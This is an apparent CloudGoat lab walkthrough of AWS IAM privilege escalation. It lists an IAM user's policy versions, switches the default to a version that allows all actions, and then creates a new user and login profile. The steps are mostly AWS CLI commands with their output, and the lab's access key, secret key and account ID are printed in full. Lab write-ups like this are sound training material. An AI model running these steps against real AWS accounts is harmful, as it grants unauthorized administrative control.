IAM PrivEsc - RollBack
Review previous versions of the IAM user's policies to PrivEsc
Ultimate Goal
From an IAM User "Raynor" => To acquire full Admin Privileges
Getting Started
Deploy the lab via cloudgoat
cat /Users/d0p/Cloudgoat/iam_privesc_by_rollback_cgidq5mcziu8uh/start.txt
cloudgoat_output_aws_account_id = 242643118057
cloudgoat_output_policy_arn = arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh
cloudgoat_output_raynor_access_key_id = AKIATQ7VIE7UZGXOZL5K
cloudgoat_output_raynor_secret_key = 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
cloudgoat_output_username = raynor-iam_privesc_by_rollback_cgidq5mcziu8uh
We get a raynor's access_key and secret_key - Let's configure the IAM profile
aws configure --profile ray
[ACCESS KEY]:
[SECRET KEY]:
....
So that we've now created a IAM profile ray - Let's see if we have the privilege to create a demo user
aws iam create-user --user-name demo --profile ray
An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::242643118057:user/raynor-iam_privesc_by_rollback_cgidq5mcziu8uh is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::242643118057:user/demo because no identity-based policy allows the iam:CreateUser action
Sadly, we don't have the access to create
Let's dig deep by enumerating the policies attached with the IAM user raynor !
aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
"AttachedPolicies": [
{
"PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh",
"PolicyArn": "arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh"
}
]
}
Let's quickly make a note of that
PolicyArn
Now that we know we have few policies attached - let's try getting the policy version
aws iam get-policy-version --profile ray
usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:
aws help
aws <command> help
aws <command> <subcommand> help
aws: error: the following arguments are required: --policy-arn, --version-id
Seems like we require the
version id
Let's try getting that first !
aws iam list-policy-versions --profile ray
usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:
aws help
aws <command> help
aws <command> <subcommand> help
aws: error: the following arguments are required: --policy-arn
Let's just paste the copied
PolicyArn
and list the version ids
aws iam list-policy-versions --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
"Versions": [
{
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v2",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-21T09:09:44+00:00"
}
]
}
We can get to know that this particular IAM user raynor's default version is
v1
Now that we got to know how many versions exists - Let's examine all the versions in detail via
get-policy-version
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v1 --profile ray
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:Get*",
"iam:List*",
"iam:SetDefaultPolicyVersion"
],
"Effect": "Allow",
"Resource": "*",
"Sid": "IAMPrivilegeEscalationByRollback"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-21T09:09:44+00:00"
}
}
V1 => Grants permissions for the listed IAM actions (
iam:Get*
,iam:List*
, andiam:SetDefaultPolicyVersion
) across all resources in the AWS account
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v5 --profile ray
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject",
"s3:ListAllMyBuckets"
],
"Resource": "*"
}
},
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
}
}
V5 => Allows the actions
s3:ListBucket
,s3:GetObject
, ands3:ListAllMyBuckets
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v4 --profile ray
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": {
"Effect": "Deny",
"Action": "*",
"Resource": "*",
"Condition": {
"NotIpAddress": {
"aws:SourceIp": [
"192.0.2.0/24",
"203.0.113.0/24"
]
}
}
}
},
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
}
}
V4 => Deny access to all actions and resources unless the request is coming from source IP address of the request matches one of the specified IP address ranges
192.0.2.0/24 or 203.0.113.0/24
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v3 --profile ray
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Action": "iam:Get*",
"Resource": "*",
"Condition": {
"DateGreaterThan": {
"aws:CurrentTime": "2017-07-01T00:00:00Z"
},
"DateLessThan": {
"aws:CurrentTime": "2017-12-31T23:59:59Z"
}
}
}
},
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
}
}
V3 => The policy's access restrictions are based on two conditions - "DateGreaterThan" and "DateLessThan"
aws iam get-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "*",
"Effect": "Allow",
"Resource": "*"
}
]
},
"VersionId": "v2",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
}
}
V2 => It grants unrestricted access to all actions ("Action": "") for all resources ("Resource": "") within the AWS account
This is the policy we need to abuse - Let's set it as our default policy !
aws iam set-default-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
Now lets cross-check if the
v2
is our default policy version -list-policy-versions
aws iam list-policy-versions --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
"Versions": [
{
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v2",
"IsDefaultVersion": true,
"CreateDate": "2023-09-21T09:09:46+00:00"
},
{
"VersionId": "v1",
"IsDefaultVersion": false,
"CreateDate": "2023-09-21T09:09:44+00:00"
}
]
}
Yes it is
So now let's try to create a demo user with our new privileges
aws iam create-user --user-name demo --profile ray
{
"User": {
"Path": "/",
"UserName": "demo",
"UserId": "AIDATQ7VIE7URIBSBP5WG",
"Arn": "arn:aws:iam::242643118057:user/demo",
"CreateDate": "2023-09-21T09:34:09+00:00"
}
}
It works !
But wai, let's cross-check if we have full admin access by creating a login profile for the demo user
aws iam create-login-profile --user-name demo --password Passw0rd --profile ray
{
"LoginProfile": {
"UserName": "demo",
"CreateDate": "2023-09-21T09:35:59+00:00",
"PasswordResetRequired": false
}
}
To login we require the aws account ID
cat iam_privesc_by_rollback_cgidq5mcziu8uh/start.txt
cloudgoat_output_aws_account_id = 2x264x118x57
........

Exploitation Route

Last updated